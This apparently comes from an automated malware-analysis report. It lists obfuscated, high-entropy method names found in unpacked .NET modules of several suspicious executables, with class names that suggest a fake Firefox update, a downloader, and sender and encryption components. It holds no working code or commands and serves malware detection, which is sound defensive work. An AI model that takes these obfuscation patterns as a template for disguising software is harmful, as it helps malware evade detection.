Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, firefox__update__/Form1.cs High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, firefox__update__/Form1.cs High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, firefox__update__/Form1.cs High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
